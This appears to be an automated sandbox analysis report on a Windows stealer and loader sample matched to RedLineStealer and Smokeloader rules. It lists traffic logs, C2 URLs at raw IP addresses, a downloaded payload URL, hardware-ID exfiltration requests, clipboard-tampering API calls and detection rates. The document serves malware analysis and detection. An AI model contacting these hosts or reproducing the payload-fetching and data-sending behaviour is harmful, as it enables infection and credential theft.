                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 11 Dec 2024 05:57:02 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Wed, 11 Dec 2024 05:45:01 GMTETag: "4a400-628f819509315"Accept-Ranges: bytesContent-Length: 304128Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e4 4b a7 de a0 2a c9 8d a0 2a c9 8d a0 2a c9 8d be 78 4d 8d bc 2a c9 8d be 78 5c 8d b4 2a c9 8d be 78 4a 8d f8 2a c9 8d 87 ec b2 8d ab 2a c9 8d a0 2a c8 8d ca 2a c9 8d be 78 43 8d a1 2a c9 8d be 78 5d 8d a1 2a c9 8d be 78 58 8d a1 2a c9 8d 52 69 63 68 a0 2a c9 8d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 b7 fe df 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 f4 02 00 00 1e 3f 00 00 00 00 00 f7 14 00 00 00 10 00 00 00 10 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 20 42 00 00 04 00 00 7e 9d 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f4 27 03 00 64 00 00 00 00 00 41 00 30 1d 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 03 00 6c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1c f3 02 00 00 10 00 00 00 f4 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6a 20 00 00 00 10 03 00 00 22 00 00 00 f8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 d8 b0 3d 00 00 40 03 00 00 6c 00 00 00 1a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 30 1d 01 00 00 00 41 00 00 1e 01 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 92.255.57.89Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /45c616e921a794b8.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKKKECBKKECGCAAAEHJKHost: 92.255.57.89Content-Length: 214Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 45 43 42 4b 4b 45 43 47 43 41 41 41 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 36 31 43 44 42 32 37 43 41 35 43 33 36 31 35 30 33 30 31 31 36 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 45 43 42 4b 4b 45 43 47 43 41 41 41 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 45 43 42 4b 4b 45 43 47 43 41 41 41 45 48 4a 4b 2d 2d 0d 0a Data Ascii: ------AKKKECBKKECGCAAAEHJKContent-Disposition: form-data; name="hwid"B61CDB27CA5C3615030116------AKKKECBKKECGCAAAEHJKContent-Disposition: form-data; name="build"default------AKKKECBKKECGCAAAEHJK--
                    Source: Joe Sandbox ViewIP Address: 172.67.179.207 172.67.179.207
                    Source: Joe Sandbox ViewIP Address: 92.255.57.89 92.255.57.89
                    Source: Joe Sandbox ViewASN Name: TELSPRU TELSPRU
                    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49731 -> 176.113.115.19:80
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49730 -> 172.67.179.207:443
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: 0_2_004029F4 InternetOpenW,InternetOpenUrlW,GetTempPathW,GetTempFileNameW,CreateFileW,InternetReadFile,WriteFile,CloseHandle,CloseHandle,ShellExecuteExW,WaitForSingleObject,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_004029F4
                    Source: global trafficHTTP traffic detected: GET /track_prt.php?sub=0&cc=DE HTTP/1.1User-Agent: ShareScreenHost: post-to-me.com
                    Source: global trafficHTTP traffic detected: GET /ScreenUpdateSync.exe HTTP/1.1User-Agent: ShareScreenHost: 176.113.115.19
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 92.255.57.89Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficDNS traffic detected: DNS query: post-to-me.com
                    Source: unknownHTTP traffic detected: POST /45c616e921a794b8.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKKKECBKKECGCAAAEHJKHost: 92.255.57.89Content-Length: 214Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 45 43 42 4b 4b 45 43 47 43 41 41 41 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 36 31 43 44 42 32 37 43 41 35 43 33 36 31 35 30 33 30 31 31 36 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 45 43 42 4b 4b 45 43 47 43 41 41 41 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 45 43 42 4b 4b 45 43 47 43 41 41 41 45 48 4a 4b 2d 2d 0d 0a Data Ascii: ------AKKKECBKKECGCAAAEHJKContent-Disposition: form-data; name="hwid"B61CDB27CA5C3615030116------AKKKECBKKECGCAAAEHJKContent-Disposition: form-data; name="build"default------AKKKECBKKECGCAAAEHJK--
                    Source: SEejSLAS9f.exe, SEejSLAS9f.exe, 00000000.00000002.4093501231.0000000000959000.00000004.00000020.00020000.00000000.sdmp, SEejSLAS9f.exe, 00000000.00000003.1720854605.0000000000983000.00000004.00000020.00020000.00000000.sdmp, SEejSLAS9f.exe, 00000000.00000002.4093501231.0000000000970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe
                    Source: SEejSLAS9f.exe, 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe5rjtejk5rytrrSOFTWARE
                    Source: SEejSLAS9f.exe, 00000000.00000003.1720854605.0000000000983000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exeX
                    Source: SEejSLAS9f.exe, 00000000.00000003.1720854605.0000000000983000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exeo
                    Source: SEejSLAS9f.exe, 00000000.00000003.1720854605.0000000000983000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exev
                    Source: 1D71.tmp.exe, 00000001.00000002.2242096439.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, 1D71.tmp.exe, 00000001.00000002.2242147064.0000000000A0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://92.255.57.89
                    Source: 1D71.tmp.exe, 00000001.00000002.2242147064.0000000000A47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://92.255.57.89/
                    Source: 1D71.tmp.exe, 00000001.00000002.2242147064.0000000000A47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://92.255.57.89/45c616e921a794b8.php
                    Source: 1D71.tmp.exe, 00000001.00000002.2242147064.0000000000A5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://92.255.57.89/45c616e921a794b8.php2dPf
                    Source: 1D71.tmp.exe, 00000001.00000002.2242147064.0000000000A5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://92.255.57.89/45c616e921a794b8.php;
                    Source: 1D71.tmp.exe, 00000001.00000002.2242147064.0000000000A5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://92.255.57.89/45c616e921a794b8.phpo
                    Source: 1D71.tmp.exe, 00000001.00000002.2242147064.0000000000A3E000.00000004.00000020.00020000.00000000.sdmp, 1D71.tmp.exe, 00000001.00000002.2242147064.0000000000A50000.00000004.00000020.00020000.00000000.sdmp, 1D71.tmp.exe, 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: http://92.255.57.89/697b92cb4e247842/sqlite3.dll
                    Source: 1D71.tmp.exe, 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: http://92.255.57.89/697b92cb4e247842/sqlite3.dllform-data;
                    Source: 1D71.tmp.exe, 00000001.00000002.2242147064.0000000000A50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://92.255.57.89/697b92cb4e247842/sqlite3.dll~
                    Source: 1D71.tmp.exe, 00000001.00000002.2242147064.0000000000A0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://92.255.57.89/s
                    Source: 1D71.tmp.exe, 00000001.00000002.2242147064.0000000000A50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://92.255.57.890
                    Source: 1D71.tmp.exe, 00000001.00000002.2242096439.00000000009DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://92.255.57.89l(
                    Source: 1D71.tmp.exe, 00000001.00000002.2242147064.0000000000A0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://92.255.57.89lq
                    Source: Amcache.hve.7.drString found in binary or memory: http://upx.sf.net
                    Source: SEejSLAS9f.exe, 00000000.00000002.4093501231.0000000000959000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/
                    Source: SEejSLAS9f.exeString found in binary or memory: https://post-to-me.com/track_prt.php?sub=
                    Source: SEejSLAS9f.exe, 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=&cc=DE
                    Source: SEejSLAS9f.exe, 00000000.00000002.4093501231.0000000000959000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DE
                    Source: SEejSLAS9f.exe, 00000000.00000002.4093501231.0000000000959000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DEI
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                    Source: unknownHTTPS traffic detected: 172.67.179.207:443 -> 192.168.2.4:49730 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.179.207:443 -> 192.168.2.4:49730 version: TLS 1.2
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016DF
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016DF
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: 0_2_02471942 __EH_prolog3_GS,Sleep,OpenClipboard,GetClipboardData,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_02471942
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016DF
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeCode function: 1_2_00409876 CreateDesktopA,memset,lstrcatA,lstrcatA,lstrcatA,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlenA,wsprintfA,lstrcpy,memset,CreateProcessA,Sleep,CloseDesktop,1_2_00409876

                    System Summary

                    barindex
                    Source: 00000001.00000002.2242131092.00000000009ED000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                    Source: 00000000.00000002.4093473645.00000000008DD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                    Source: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                    Source: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: 0_2_02472361 NtdllDefWindowProc_W,GetClientRect,GetDC,CreateSolidBrush,CreatePen,Rectangle,GetDeviceCaps,MulDiv,CreateFontW,SetBkMode,_wcslen,_wcslen,_wcslen,_wcslen,ReleaseDC,0_2_02472361
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: 0_2_02472605 NtdllDefWindowProc_W,PostQuitMessage,0_2_02472605
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: 0_2_004280220_2_00428022
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: 0_2_004071AB0_2_004071AB
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: 0_2_004373D90_2_004373D9
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: 0_2_0042D4EE0_2_0042D4EE
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: 0_2_004274840_2_00427484
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: 0_2_004285600_2_00428560
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: 0_2_004166AF0_2_004166AF
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: 0_2_004137250_2_00413725
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: 0_2_004277F60_2_004277F6
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: 0_2_0040E9740_2_0040E974
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: 0_2_0042EAE00_2_0042EAE0
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: 0_2_00427AA00_2_00427AA0
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: 0_2_00418AAF0_2_00418AAF
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: 0_2_00436CBF0_2_00436CBF
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: 0_2_00427D670_2_00427D67
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: 0_2_00413F0B0_2_00413F0B
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: 0_2_024982890_2_02498289
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: 0_2_0249ED470_2_0249ED47
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: 0_2_024841720_2_02484172
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: 0_2_024976EB0_2_024976EB
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: 0_2_0249D7550_2_0249D755
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: 0_2_024987C70_2_024987C7
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: 0_2_02497A5D0_2_02497A5D
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: 0_2_0247EBDB0_2_0247EBDB
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: 0_2_024869160_2_02486916
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: 0_2_0248398C0_2_0248398C
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: 0_2_024A6F260_2_024A6F26
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: 0_2_02497FCE0_2_02497FCE
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: 0_2_0249ED470_2_0249ED47
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: 0_2_02497D070_2_02497D07
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: 0_2_02488D160_2_02488D16
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeCode function: 1_2_02494B371_2_02494B37
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: String function: 02480019 appears 119 times
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: String function: 00410720 appears 52 times
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: String function: 0040F903 appears 36 times
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: String function: 02480987 appears 52 times
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: String function: 0040FDB2 appears 123 times
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeCode function: String function: 00404980 appears 317 times
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7860 -s 1296
                    Source: SEejSLAS9f.exeStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                    Source: ScreenUpdateSync[1].exe.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                    Source: 1D71.tmp.exe.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                    Source: SEejSLAS9f.exeBinary or memory string: OriginalFileName vs SEejSLAS9f.exe
                    Source: SEejSLAS9f.exe, 00000000.00000003.1669820867.00000000024E0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameScreenshoter.exeF vs SEejSLAS9f.exe
                    Source: SEejSLAS9f.exe, 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileNameScreenshoter.exeF vs SEejSLAS9f.exe
                    Source: SEejSLAS9f.exe, 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameScreenshoter.exeF vs SEejSLAS9f.exe
                    Source: SEejSLAS9f.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 00000001.00000002.2242131092.00000000009ED000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                    Source: 00000000.00000002.4093473645.00000000008DD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                    Source: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                    Source: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                    Source: SEejSLAS9f.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: ScreenUpdateSync[1].exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 1D71.tmp.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: classification engineClassification label: mal100.troj.evad.winEXE@4/7@1/3
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: 0_2_008DE5C6 CreateToolhelp32Snapshot,Module32First,0_2_008DE5C6
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeCode function: 1_2_0248CE47 CoCreateInstance,MultiByteToWideChar,lstrcpyn,1_2_0248CE47
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\track_prt[1].htmJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7860
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeMutant created: \Sessions\1\BaseNamedObjects\5rjtejk5rytrr
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeFile created: C:\Users\user\AppData\Local\Temp\1D71.tmpJump to behavior
                    Source: SEejSLAS9f.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: SEejSLAS9f.exeReversingLabs: Detection: 42%
                    Source: SEejSLAS9f.exeVirustotal: Detection: 38%
